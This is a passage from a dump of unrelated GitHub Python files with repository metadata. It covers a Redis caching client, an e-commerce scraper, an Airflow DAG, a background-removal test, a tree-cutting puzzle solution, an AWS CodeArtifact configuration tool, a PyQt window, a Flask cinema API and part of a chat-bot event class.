key = f'{key}:{args[id_index]}'\n objs = []\n\n if service is None:\n # recommend service is down, resort to redis\n try:\n redis = await self.connect()\n robjs = await redis.lrange(key, 0, -1)\n robjs = robjs or []\n for robj in robjs:\n if robj is None:\n continue\n\n obj = creator()\n mobj = TMemoryBuffer(lz4.frame.decompress(robj))\n cobj = TCompactProtocol(mobj)\n obj.read(cobj)\n objs.append(obj)\n\n logger.debug(f'[REDIS] Get list of {key} from cache')\n except Exception as e:\n log.print_excp(e)\n else:\n objs = await f(*args, **kwargs)\n # save obj to redis randomly\n if self.lucky() and objs is not None and len(objs) > 0:\n try:\n redis = await self.connect(True)\n vals = []\n for obj in objs:\n mobj = TMemoryBuffer()\n cobj = TCompactProtocol(mobj)\n obj.write(cobj)\n vals.append(lz4.frame.compress(mobj.getvalue()))\n\n if len(vals) > 0:\n tr = redis.multi_exec()\n tr.ltrim(key, 1, 0)\n tr.rpush(key, *vals)\n tr.expire(key, RECO_TTL)\n\n await tr.execute()\n logger.debug(f'[REDIS] Set list of {key} to cache')\n except Exception as e:\n log.print_excp(e)\n\n return objs\n\n return g\n\n return wrapper\n\n async def cache_set(self, f, creator, prefix, id_index, *args, **kwargs):\n capacity = 10\n service = args[0]\n version = self.get_reco_version(creator)\n key = f'{prefix}:{version}'\n if id_index is not None:\n key = f'{key}:{args[id_index]}'\n obj = None\n\n if service is None:\n # 
recommend service is down, fetch one from redis randomly\n try:\n redis = await self.connect()\n robj = await redis.srandmember(key)\n if robj is not None:\n obj = creator()\n mobj = TMemoryBuffer(lz4.frame.decompress(robj))\n cobj = TCompactProtocol(mobj)\n obj.read(cobj)\n\n logger.debug(f'[REDIS] Get Response obj of {key} from cache')\n except Exception as e:\n log.print_excp(e)\n else:\n obj = await f(*args, **kwargs)\n\n # save obj to redis randomly\n if self.lucky() and obj is not None:\n try:\n redis = await self.connect(True)\n # del some randomly when total number is more than {capacity}\n total = await redis.scard(key)\n if total > capacity * 1.25:\n await redis.execute('spop', key, int(total - capacity * 0.75))\n else:\n tr = redis.multi_exec()\n mobj = TMemoryBuffer()\n cobj = TCompactProtocol(mobj)\n obj.write(cobj)\n tr.sadd(key, lz4.frame.compress(mobj.getvalue()))\n tr.expire(key, RECO_TTL)\n await tr.execute()\n logger.debug(f'[REDIS] Set Response obj of {key} to cache')\n except Exception as e:\n log.print_excp(e)\n\n return obj\n\n def cache_tabs(self, interfaceName, id_index):\n def wrapper(f):\n async def fn(*args, **kwargs):\n objs = await f(*args, **kwargs)\n return objs[0] if len(objs) > 0 else None\n\n async def g(*args, **kwargs):\n obj = await self.cache_set(fn, recttypes.Tabs, f'tab:{interfaceName}', id_index, *args, **kwargs)\n return [obj] if obj is not None else []\n\n return g\n\n return wrapper\n\n def cache_card(self, interfaceName, id_index=None):\n def wrapper(f):\n async def g(*args, **kwargs):\n return await self.cache_set(f, recttypes.Response, interfaceName, id_index, *args, **kwargs)\n\n return g\n\n return wrapper\n\n async def get_details_from_cache(self, idts, prefix):\n obj = dittypes.DIResponse(typeList=[idt.type for idt in idts])\n idts_left = None\n try:\n # 先从Redis拿数据\n redis = await self.connect()\n idts_left = []\n\n for idt in idts:\n typ = idt.type\n ids = idt.ids\n\n version = self.get_di_version(typ)\n key_prefix = f'{prefix}:{typ}:{version}'\n keys = [f'{key_prefix}:{i}' for i in ids]\n # 一次从多个key读取数据\n items = await redis.mget(*keys)\n logger.debug(f'[REDIS] Get {len(items)} DIResponse objs of {typ} from redis')\n\n ids = [ids[i] for i, v in enumerate(items) if v is None]\n items = [it for it in items if it is not None]\n\n if len(ids) > 0:\n idts_left.append(dittypes.IdsWithType(ids=ids, type=typ))\n\n vals = []\n for item in items:\n if item is None:\n continue\n\n # 从Redis中的二进制数据恢复成所需结构\n creator = self.di_creator(typ)\n if creator is None:\n continue\n\n val = creator()\n mval = TMemoryBuffer(lz4.frame.decompress(item))\n cval = TCompactProtocol(mval)\n val.read(cval)\n vals.append(val)\n\n self.di_setlist(obj, typ, vals)\n except Exception as e:\n log.print_excp(e)\n\n return obj, idts_left\n\n async def set_details_to_cache(self, obj_left, prefix):\n try:\n redis = await self.connect(write=True)\n\n pairs = []\n keys = []\n types = obj_left.typeList\n\n for typ in types:\n version = self.get_di_version(typ)\n key_prefix = f'{prefix}:{typ}:{version}'\n items = self.di_getlist(obj_left, typ)\n\n for it in items:\n key = f'{key_prefix}:{self.di_id(typ, it)}'\n mval = TMemoryBuffer()\n cval = TCompactProtocol(mval)\n it.write(cval)\n pairs.extend((key, lz4.frame.compress(mval.getvalue())))\n keys.append(key)\n\n # 一次性向Redis中存储多个数据\n if len(pairs) > 0:\n tr = redis.multi_exec()\n tr.mset(*pairs)\n\n for key in keys:\n tr.expire(key, DI_TTL)\n\n await tr.execute()\n logger.debug(f'[REDIS] Set {len(items)} DIResponse objs of 
type:{typ} to redis')\n\n except Exception as e:\n log.print_excp(e)\n\n def cache_details(self, idts_index=None, id_index=None, type_index=None): # idt means ids_with_type\n prefix = 'di'\n\n def wrapper(f):\n async def g(*args, **kwargs):\n is_group = idts_index is not None\n idts = args[idts_index] if is_group else [\n dittypes.IdsWithType(ids=[args[id_index]], type=args[type_index])]\n (obj, idts_left) = await self.get_details_from_cache(idts, prefix)\n\n if idts_left is None:\n idts_left = idts\n\n if len(idts_left) <= 0:\n return obj\n\n if is_group:\n args = [arg for arg in args]\n args[idts_index] = idts_left\n\n # 从底层服务拿数据\n obj_left = await f(*args, **kwargs)\n\n if obj_left is not None:\n await self.set_details_to_cache(obj_left, prefix)\n else:\n return obj\n\n # 合并obj和obj_left\n idts_left_map = {idt.type: idt.ids for idt in idts_left}\n for idt in idts:\n typ = idt.type\n if idts_left_map.get(typ) is None:\n continue\n\n ids = idt.ids\n items = self.di_getlist(obj, typ) or []\n left_items = self.di_getlist(obj_left, typ) or []\n\n items_map = {self.di_id(typ, it): it for it in items}\n left_items_map = {self.di_id(typ, it): it for it in left_items}\n\n merged_items = [items_map.get(id) or left_items_map.get(id) for id in ids]\n self.di_setlist(obj, typ, [it for it in merged_items if it is not None])\n\n return obj\n\n return g\n\n return wrapper\n\n def di_id(self, typ, item):\n from models.v1.resource.base_video import BaseVideo\n api_cls = self.api_cls(typ)\n if issubclass(api_cls, BaseVideo):\n res = item.BaseVideo.id\n else:\n res = item.id\n\n return res\n\n def api_cls(self, typ):\n from models.v1.request_handler import REC_TYPE_TO_CLS_BASE\n return REC_TYPE_TO_CLS_BASE.get(typ)\n\n def di_list_name(self, typ):\n api_cls = self.api_cls(typ)\n return api_cls and api_cls.DI_LIST_NAME\n\n def di_cls_name(self, typ):\n api_cls = self.api_cls(typ)\n return api_cls and api_cls.DI_CLS_NAME\n\n def di_getlist(self, di, typ):\n list_name = self.di_list_name(typ)\n return list_name and getattr(di, list_name) or []\n\n def di_setlist(self, di, typ, items):\n list_name = self.di_list_name(typ)\n if list_name:\n setattr(di, list_name, items)\n\n def di_creator(self, typ):\n cls_name = self.di_cls_name(typ)\n return cls_name and getattr(dittypes, cls_name)\n\n # def cache_related_card(self, interfaceName, id_index=-1):\n # capacity = 5\n # prefix = interfaceName\n # def wrapper(f):\n # async def g(*args, **kwargs):\n # service = args[0]\n # rid = args[id_index]\n # skey = f'{prefix}:{rid}'\n # obj = None\n\n # if service is None:\n # # service is down, fetch from redis\n # try:\n # redis = await self.connect()\n # robj = await redis.srandmember(skey)\n # obj = recttypes.Response()\n # mobj = TMemoryBuffer(robj)\n # cobj = TCompactProtocol(mobj)\n # obj.read(cobj)\n # logger.debug(f'[REDIS] Get Response obj of {interfaceName}:{rid} from cache')\n # except Exception as e:\n # log.print_excp(e)\n # else:\n # obj = await f(*args, **kwargs)\n # if self.lucky() and obj is not None:\n # try:\n # redis = await self.connect(write=True)\n # # del some randomly when too many\n # total = await redis.scard(skey)\n # if total > capacity:\n # await redis.execute('spop', skey, int(total - capacity * 0.75))\n # else:\n # # save id to the redis set corresponding to interfaceName\n # mobj = TMemoryBuffer()\n # cobj = TCompactProtocol(mobj)\n # obj.write(cobj)\n # await redis.sadd(skey, mobj.getvalue())\n # logger.debug(f'[REDIS] Set Response obj of {interfaceName}:{rid} to cache')\n\n # # set ttl of 
skey\n # await redis.expire(skey, RELATED_CARD_TTL)\n # except Exception as e:\n # log.print_excp(e)\n\n # return obj\n\n # return g\n # return wrapper\n\n\nredis = RedisClient()\n","repo_name":"harryjack2017/bm","sub_path":"services/redis_client.py","file_name":"redis_client.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38950122014","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\nimport re\n\nlist=[]\npage=1\nwhile page<=10:\n header={\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36\"}\n url=\"https://www.trendyol.com/kulaklik-x-c92?pi=\"+str(page)+\"\"\n\n get=requests.get(url,headers=header)\n content=get.content\n soup=BeautifulSoup(content,\"lxml\")\n\n p = soup.find_all(\"div\", attrs={\"class\": \"p-card-wrppr add-to-bs-card\"})\n\n for link in p:\n domain = \"https://www.trendyol.com\"\n links = domain + link.a.get(\"href\")\n product_name = link.find(\"div\", attrs={\"class\": \"prdct-desc-cntnr\"}).text.strip()\n price = link.find(\"div\", attrs={\"class\": \"pr-bx-nm with-org-prc\"}).text.strip()\n free_shipping = str(link.find(\"div\", attrs={\"class\": \"stmp fc\"}))\n free_shipping=re.sub(\"<.*?>\",\"\",free_shipping).replace(\"KARGO BEDAVA\",\"var\").replace(\"None\",\"yok\")\n fast_delivery=str(link.find(\"div\", attrs={\"class\": \"stmp rd\"}))\n fast_delivery = re.sub(\"<.*?>\", \"\", fast_delivery).replace(\"HIZLI TESLİMAT\",\"var\").replace(\"None\",\"yok\")\n review_count = str(link.find(\"span\", attrs={\"class\": \"ratingCount\"}))\n review_count=re.sub(\"<.*?>\", \"\", review_count).strip(\"()\")\n\n\n\n list.append([product_name,links,price,free_shipping,fast_delivery,review_count])\n page = page + 1\n\ndf = pd.DataFrame(list)\ndf.columns = [\"product_name\",\"links\",\"price\",\"free_shipping\",\"fast_delivery\",\"review_count\"]\ndf.to_csv(\"data\\trendyol.csv\")","repo_name":"EmirErdem/scrap_ecommerce","sub_path":"scrap_ecommerce/trendyol.py","file_name":"trendyol.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"30126755234","text":"from datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom utils.helpers import sleeper\n\nnow = datetime.now()\n\ndefault_args = {\n 'start_date': datetime(now.year, now.month, now.day),\n}\n\nwith DAG('dummy_dag', default_args=default_args, schedule_interval='@daily') as dag:\n # DummyOperator represents a task with no actual functionality\n task1 = DummyOperator(task_id='task1')\n task2 = DummyOperator(task_id='task2')\n task3 = DummyOperator(task_id='task3')\n\n sleeper_task1 = PythonOperator(\n task_id='sleeper_task1',\n python_callable=sleeper,\n op_kwargs={'sec': 10},\n )\n\n sleeper_task2 = PythonOperator(\n task_id='sleeper_task2',\n python_callable=sleeper,\n op_kwargs={'sec': 5},\n )\n\n task1 >> sleeper_task1 >> task2 >> sleeper_task2 >> task3\n","repo_name":"dendihandian/minimal-airflow-docker","sub_path":"docker/airflow/dags/prod/dummy_dag.py","file_name":"dummy_dag.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14092149339","text":"\"\"\"\nauthor: Jet Chien\nGitHub: 
https://github.com/jet-c-21\nCreate Date: 11/19/21\n\"\"\"\n# coding: utf-8\nimport time\n\nimport PIL\nimport numpy as np\nfrom cv2 import cv2\nfrom rembg.bg import get_model, naive_cutout\nfrom rembg.u2net.detect import predict\n\n\ndef pil_image_to_np_ndarray(image: PIL.Image.Image) -> np.ndarray:\n return cv2.cvtColor(np.asarray(image), cv2.COLOR_RGB2BGR)\n\n\ndef np_ndarray_to_pil_image(image: np.ndarray) -> PIL.Image.Image:\n return PIL.Image.fromarray(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\n\ndef show_img(image: np.ndarray):\n cv2.imshow('', image)\n cv2.waitKey(0)\n\n\ndef remove_bg(model, image: np.ndarray) -> np.ndarray:\n # image = np_ndarray_to_pil_image(image)\n mask = predict(model, image).convert(\"L\")\n # mask.show()\n\n image = np_ndarray_to_pil_image(image)\n cutout = naive_cutout(image, mask)\n print(f\"cutout type = {type(cutout)}\")\n\n return pil_image_to_np_ndarray(cutout)\n\n\nIMG_PATH = 'peace_0.jpg'\n\nif __name__ == '__main__':\n img = cv2.imread(IMG_PATH)\n # show_img(img)\n\n u2net_model = get_model('u2net')\n\n s = time.time()\n res = remove_bg(u2net_model, img)\n e = time.time()\n\n print(e - s)\n\n show_img(res)\n","repo_name":"juancvargas/ASL_Translator","sub_path":"Archive/hand_playground/remove_background/background_remove_test.py","file_name":"background_remove_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"72902042014","text":"__author__ = \"Davide Semenzin (davidesn@amazon.com)\"\n__version__ = \"1.0.0\"\n\nimport csv\nimport os\nimport sys\nimport argparse\nfrom collections import defaultdict\nfrom toolkit.codeartifact_client import CodeArtifactClient\nfrom toolkit.utils import PACKAGE_TYPES, CSV_HEADER, parse_poc_flags\n\nDEFAULT_RESTRICTIONS = {'upstream': 'ALLOW', 'publish': 'ALLOW'}\nRESTRICTIONS_WITH_UPSTREAM_VERSIONS_BLOCKED = {'upstream': 'BLOCK', 'publish': 'ALLOW'}\n\n\ndef generate_package_configuration_entries(args, packages, origin_configuration):\n \"\"\"\n This generator function takes in a list of packages and an origin configuration pattern, and returns a fully-formed\n package record by interpolating with args parameters.\n \"\"\"\n for package in packages:\n line = {\n 'domain': args.domain,\n 'repository': args.repository,\n 'namespace': args.namespace if args.namespace else '',\n 'format': package['format'],\n 'package': package['package'],\n 'upstream': origin_configuration['upstream'],\n 'publish': origin_configuration['publish']\n }\n yield line\n\n\ndef block_where_possible(packages_map, current_repo_ecs):\n \"\"\"\n Decides whether or not acquiring new versions from upstreams can be safely restricted for each provided package\n in the target repository.\n We block acquisition of new versions from upstreams if and only if the target repository doesn't have direct access\n to an external connection, i.e., a public repository AND no versions of the package are available via any of\n the upstreams, either because the target repository doesn't have any upstreams or because none of the upstreams\n have the package. 
Falls back to allowing acquisition of new versions from the upstream by default.\n \"\"\"\n packages_with_no_restrictions = []\n packages_with_upstream_versions_restricted = []\n\n for package_coordinate, upstreams in packages_map.items():\n package_format, package_namespace, package_name = package_coordinate\n package_entry = {'repository': args.repository,\n 'format': package_format,\n 'package': package_name,\n 'namespace': package_namespace}\n\n # First verify whether there is an immediate EC available for this package type in the current repository\n if next((external_connection for external_connection in current_repo_ecs\n if external_connection.get('packageFormat') == package_format), False):\n packages_with_no_restrictions.append(package_entry)\n continue\n\n # If no EC, then let's look at upstreams: if the package is present in any of the upstreams, then we can't block\n if len(upstreams) != 0:\n packages_with_no_restrictions.append(package_entry)\n continue\n\n # Otherwise, we can BLOCK\n packages_with_upstream_versions_restricted.append(package_entry)\n return packages_with_no_restrictions, packages_with_upstream_versions_restricted\n\n\ndef get_candidate_package_list(codeartifact_client):\n \"\"\"\n This function produces a suitable packages list (in the form {'name': package name, 'format': package format})\n from either the locally-supplied list or from a query against a repository.\n \"\"\"\n if args.from_list:\n packages_from_list = []\n with open(args.from_list, \"r\") as input_file:\n reader = csv.reader(input_file)\n for package in reader:\n packages_from_list.append({'format': args.format, 'package': package[0]})\n return packages_from_list\n else:\n return codeartifact_client.list_packages_in_repository(repository=args.repository,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n\n\ndef collect_repository_and_package_information(codeartifact_client):\n \"\"\"\n This function gathers information about the current repository's package list, External Connections (ECs)\n and upstreams. 
If upstreams are present, it checks and records whether any target packages are present.\n \"\"\"\n package_to_repositories_with_package_map = defaultdict(list)\n current_repo_upstream, current_repo_ecs = codeartifact_client\\\n .get_repo_upstreams_and_external_connections(args.repository)\n upstream_graph = [] if current_repo_upstream is None else codeartifact_client.get_upstream_graph(args.repository)\n candidate_packages = get_candidate_package_list(codeartifact_client)\n\n for upstream in upstream_graph:\n packages_list = codeartifact_client.list_packages_in_repository(repository=upstream,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n for package in packages_list:\n if package in candidate_packages:\n package_to_repositories_with_package_map[\n (package['format'], package.get('namespace'), package['package'])\n ].append(upstream)\n\n return package_to_repositories_with_package_map, current_repo_ecs\n\n\ndef generate_default_package_configuration_entries(codeartifact_client):\n \"\"\"\n This function implements \"automatic mode\" and is responsible for orchestrating the process of deciding\n what packages we can block the upstream configuration for, and for writing the result to the output file.\n \"\"\"\n packages_map, current_repo_ecs = collect_repository_and_package_information(codeartifact_client)\n packages_with_no_restrictions, packages_with_upstream_versions_restricted = \\\n block_where_possible(packages_map, current_repo_ecs)\n with open(args.output_file, 'w+') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for line in generate_package_configuration_entries(args, packages_with_no_restrictions,\n DEFAULT_RESTRICTIONS):\n writer.writerow(line)\n for line in generate_package_configuration_entries(args, packages_with_upstream_versions_restricted,\n RESTRICTIONS_WITH_UPSTREAM_VERSIONS_BLOCKED):\n writer.writerow(line)\n\n\ndef write_from_query(codeartifact_client):\n \"\"\"\n This function implements \"manual mode\", where a set of query parameters for ListPackages has been\n supplied, as well as an explicit origin configuration to be applied to all of them. Here we simply\n execute the query and then write the desired origin configuration in the output file.\n \"\"\"\n packages_list = codeartifact_client.list_packages_in_repository(repository=args.repository,\n package_format=args.format,\n package_namespace=args.namespace,\n package_prefix=args.prefix)\n iterator = generate_package_configuration_entries(args, packages_list, parse_poc_flags(args.configuration))\n with open(args.output_file, \"w+\") as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for entry in iterator:\n writer.writerow(entry)\n\n\ndef generate_from_provided_list():\n \"\"\"\n This function simply reads the user-supplied list and simply transforms it into a well-formed CSV\n without making any calls to AWS CodeArtifact, nor performing any verification. 
It expects the input\n to be well-formed as well.\n \"\"\"\n origin_configuration = parse_poc_flags(args.configuration)\n with open(args.from_list, \"r\") as input_file:\n reader = csv.reader(input_file)\n with open(args.output_file, \"w+\") as output_file:\n writer = csv.DictWriter(output_file, fieldnames=CSV_HEADER)\n writer.writeheader()\n for package in reader:\n package_entry = {\n 'domain': args.domain,\n 'repository': args.repository,\n 'namespace': args.namespace if args.namespace else '',\n 'package': package[0],\n 'format': args.format,\n 'upstream': origin_configuration['upstream'],\n 'publish': origin_configuration['publish']\n }\n writer.writerow(package_entry)\n\n\ndef main():\n \"\"\"\n Main entry point. This function routes execution towards the appropriate sub-functions depending\n on the supplied arguments combination.\n \"\"\"\n # The only mode that doesn't invoke the CA API is operating from a user-provided list\n # where origin configuration is also provided per-package.\n if args.from_list and args.configuration:\n return generate_from_provided_list()\n\n codeartifact_client = CodeArtifactClient(profile=args.profile if args.profile else os.environ.get('AWS_PROFILE'),\n region_name=args.region,\n codeartifact_domain=args.domain)\n\n if args.configuration:\n # Manual mode: this code path just applies the same configuration to all packages matching the query parameters\n write_from_query(codeartifact_client)\n else:\n # Auto mode: this code path tries to resolve where it's possible to block upstreams\n generate_default_package_configuration_entries(codeartifact_client)\n\n\ndef get_parser():\n command_description = \"This command generates a list (file?) of package configurations containing \" \\\n \"the restrictions on origin of new versions for packages in the provided repository. \" \\\n \"We use a default heuristic that only blocks acquisition of new versions \" \\\n \"from upstreams if no versions of the package are available via any of your \" \\\n \"upstreams and otherwise allows both publishing new versions of the package \" \\\n \"into the repository and acquiring new versions of the package from upstreams. \" \\\n \"If you wish to supply your own origin restrictions instead, please use the \" \\\n \"--set-restrictions option. Please see usage examples further below. \" \\\n \"By default, all packages in the repository will be considered, but you may use \" \\\n \"the various filtering arguments to scope down to packages of a specific format, \" \\\n \"under a specific namespace or following a specific prefix. 
\" \\\n \"You can combine the various filtering options, but note that the format \" \\\n \"is required in order to use the namespace filtering option\"\n parser = argparse.ArgumentParser(description=command_description)\n parser.add_argument(\"--profile\", help=\"AWS profile to be used (if environment variable not set).\")\n parser.add_argument('--domain', required=True, help=\"CodeArtifact domain\")\n parser.add_argument('--repository', required=True, help=\"Repository name\")\n parser.add_argument('--region', required=True, help=\"AWS region\")\n parser.add_argument('--namespace', help='Package namespace')\n parser.add_argument('--format', choices=PACKAGE_TYPES, help='Package format')\n parser.add_argument('--prefix', help='Package name search prefix')\n parser.add_argument('--set-restrictions', dest='configuration', help='A string describing the origin configuration.'\n 'It should be supplied in the follwing form:'\n '\\\"publish=[BLOCK|ALLOW],'\n 'upstream=[BLOCK|ALLOW]\\\". For example, to '\n 'block all upstream for a package in a '\n 'repository, you would assert '\n '\\\"publish=ALLOW,upstream=BLOCK\\\". See the '\n 'CodeArtifact documentation for more info.')\n parser.add_argument('--from-list', help='Name of a file containing a list of packages. If this parameter is '\n 'supplied the script creates a well-formed CSV file. This option '\n 'requires \\\"--set-restrictions\\\"')\n parser.add_argument('--output-file', help='The file name to output to. If not supplied, it defaults to '\n '\\\"origin_configuration_[domain]_[repository].csv\\\"')\n return parser\n\n\ndef parse_args(input_args):\n \"\"\"\n Additional argument processing outside of argparse scope\n \"\"\"\n parser = get_parser()\n parsed_args = parser.parse_args(input_args)\n if not parsed_args.output_file:\n parsed_args.output_file = f'origin_configuration_{parsed_args.domain}_{parsed_args.repository}.csv'\n print(f\"Result is going to be written to {parsed_args.output_file}\")\n if parsed_args.from_list and parsed_args.format is None:\n parser.error(\"List-only requires package format\")\n if parsed_args.namespace is not None and parsed_args.format is None:\n parser.error(\"Namespace requires package format\")\n return parsed_args\n\n\nif __name__ == \"__main__\":\n args = parse_args(sys.argv[1:])\n main()\n","repo_name":"aws/codeartifact-origin-control-toolkit","sub_path":"generate_package_configurations.py","file_name":"generate_package_configurations.py","file_ext":"py","file_size_in_byte":14087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"8145441657","text":"from PyQt5.QtWidgets import QWidget, QLabel\nfrom Checkbox import Checkbox\nfrom Textbox import Textbox\nfrom StartButton import StartButton\nfrom PreprocessingManager import PreprocessingManager\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.checkbox = Checkbox(self)\n self.textbox_directory = Textbox(self,(210, 10))\n self.textbox_filename = Textbox(self, (210, 60))\n self.start_button = StartButton(self)\n self.preprocessing_manager = PreprocessingManager(self)\n self.label_dir = QLabel(parent=self, text=\"Folder name (empty for current)\")\n self.label_dir.move(10, 20)\n self.label_dir = QLabel(parent=self, text=\"File name (empty for all files)\")\n self.label_dir.move(10, 
70)","repo_name":"Romanovg185/info-vis-MutS","sub_path":"Preprocessing/Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"42953199778","text":"from flask import g\nfrom flask_restful import Resource, reqparse, abort, fields, marshal\n\nfrom App.apis.apis_constant import HTTP_CREATE_OK, HTTP_OK\nfrom App.apis.cinema.cinema_user_utils import require_permission, login_require\nfrom App.models.cinema.cinema_address_model import CinemaAddress\nfrom App.models.cinema.cinema_hall_model import Hall\nfrom App.models.cinema.cinema_user_constant import PERMISSION_WRITE\nfrom App.models.cinema.cinema_user_model import CinemaUser\n\nparse = reqparse.RequestParser()\nparse.add_argument('h_num',required=True,help='请提供放映厅编号')\nparse.add_argument('h_seats',required=True,help='请提供��位数')\nparse.add_argument('h_address_id',required=True,type=int,help='请提供电影院地址')\n\nhall_fields = {\n 'h_address_id':fields.Integer,\n 'h_num':fields.Integer,\n 'h_seats':fields.String\n}\n\nmulti_hall_fields= {\n 'halls':fields.List(fields.Nested(hall_fields))\n}\n\nclass CinemaHallsResource(Resource):\n @require_permission(PERMISSION_WRITE)\n def post(self):\n user_id = g.user.id\n args = parse.parse_args()\n h_num = args.get('h_num')\n h_seats = args.get('h_seats')\n h_address_id = args.get('h_address_id')\n cinema_address = CinemaAddress.query.filter(CinemaAddress.c_user_id==user_id).filter(CinemaAddress.id==h_address_id).first()\n if not cinema_address:\n abort(400,msg='该影院不存在')\n hall = Hall()\n hall.h_num = h_num\n hall.h_address_id = h_address_id\n hall.h_seats = h_seats\n if not hall.save():\n abort(400,msg='放映厅创建失败')\n cinema_address.hallnum += 1\n if not cinema_address.save():\n abort(400,msg='同步影院信息失败')\n data = {\n 'status':HTTP_CREATE_OK,\n 'msg':'放映厅创建成功',\n 'data':marshal(hall,hall_fields)\n }\n return data\n\n def get(self):\n pass","repo_name":"ruoxianss/Flask-Tpp","sub_path":"App/apis/cinema/cinema_hall_api.py","file_name":"cinema_hall_api.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"761268010","text":"#!/bin/python3\n\n# https://www.hackerrank.com/challenges/cut-the-tree\n\nimport sys\nfrom collections import Counter\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.adjacent = [] \n def add_adjacent(self, adj):\n self.adjacent.append(adj)\n \nclass Tree:\n def __init__(self, root):\n self.root = root\n \nclass DFSNode:\n def __init__(self, value):\n self.value = value\n self.adjacent = [] \n self.visited = False\n def add_adjacent(self, adj):\n self.adjacent.append(adj)\n def visit(self):\n self.visited = True\n \nclass DFSTree:\n def __init__(self, root):\n self.root = root\n self.sum = 0\n def add(self,value):\n self.sum = self.sum + value\n\n# number of nodes\nN = int(input().strip())\n\n# initialize lists of nodes and edges\nnodes = list()\nedges = list()\n\n# populate nodes \nvals = [int(q_temp) for q_temp in input().strip().split(' ')]\nfor i in range(0,N):\n nodes.append(Node(vals[i]))\n\n# record edges between nodes\nfor i in range(0,N-1):\n e = [int(q_temp) for q_temp in input().strip().split(' ')]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n edges.append(e)\n \n\ndef buildDFSTree(vals,edges):\n nodes = list()\n # populate nodes \n for i in range(0,N):\n 
nodes.append(DFSNode(vals[i]))\n print(vals[i])\n # record edges between nodes\n for i in range(0,N-1):\n e = edges[i]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n tree = DFSTree(nodes[0])\n return(tree)\n \n\ndef tree_sums(root, current_sum):\n current_sum += root.value\n root.visited = True\n if len(root.adjacent) == 0:\n return(current_sum)\n subtree_sums = 0\n all_adj_visited = True\n for i in range(len(root.adjacent)):\n if root.adjacent[i].visited == False:\n all_adj_visited = False\n subtree_sums += tree_sums(root.adjacent[i], 0)\n if all_adj_visited:\n return(current_sum)\n else:\n return(current_sum+subtree_sums)\n \n# consider graph abstraction with unordered edges\n\n# do not necessarily need parent/child abstraction\n\n# remove an edge\n\ndef buildDFSNodes(vals,edges):\n nodes = list()\n # populate nodes \n for i in range(len(vals)):\n nodes.append(DFSNode(vals[i]))\n # record edges between nodes\n for i in range(len(edges)):\n e = edges[i]\n node1 = nodes[e[0]-1]\n node2 = nodes[e[1]-1]\n node1.add_adjacent(node2)\n node2.add_adjacent(node1)\n return(nodes)\n \ndef find_min_cut(vals,edges):\n min_cut = 10**100\n for i in range(0,len(edges)):\n # copy edges\n thisedges = edges.copy()\n # get indices for starting two graphs\n ind1 = thisedges[i][0]-1\n ind2 = thisedges[i][1]-1\n # remove edge of interest\n thisedges.remove(thisedges[i])\n # build graph\n nodesx = buildDFSNodes(vals,thisedges)\n # get difference in graph sums\n sum1 = tree_sums(nodesx[ind1],0)\n sum2 = tree_sums(nodesx[ind2],0)\n cut = abs(sum1-sum2)\n if cut < min_cut:\n min_cut = cut\n return(min_cut)\n \nmin_cut = find_min_cut(vals,edges)\nprint(min_cut)\n \n\n\n\n\n\n\n\n","repo_name":"ryandavis3/hackerrank","sub_path":"misc/cut_the_tree.py","file_name":"cut_the_tree.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"473962565","text":"from copy import copy\nfrom typing import Any, Optional, Union\n\nfrom ..client import Client\nfrom ..http import WebHttpClient\nfrom .models import Auth, BaseEvent, Message\n\nclass Event(BaseEvent):\n def __init__(self, auth: Auth, data) -> None:\n super().__init__(**data, **data[\"chatMessage\"])\n \n self.client: Client = Client(self.ndcId, check_updates=False)\n self.client.auth = auth\n self.client.ndc_id = self.ndcId\n \n self.client.ndc_id = self.ndcId\n \n self.web: WebHttpClient = self.client.web\n \n client: Optional[Any] = None\n web: Optional[Any] = None\n \n async def send_message(\n self, \n message: str = None,\n mentions: list = None, \n reply_to_id: str = None,\n type: int = 0\n ) -> Message:\n return await self.client.send_message(\n self.threadId, message, type, reply_to_id, mentions)\n \n async def send_web_message(\n self, \n message: str = None,\n type: int = 0\n ):\n return await self.client.web.send_message(\n self.threadId, message, type)\n\n async def reply_message(\n self,\n message: str = None,\n mentions: list = None,\n type: int = 0,\n embed_id: str = None,\n embed_type: int = None,\n embed_link: str = None, \n embed_title: str = None, \n embed_content: str = None, \n embed_image: Union[bytes, str] = None\n ) -> Message:\n return await self.client.send_message(\n self.threadId, message, type, 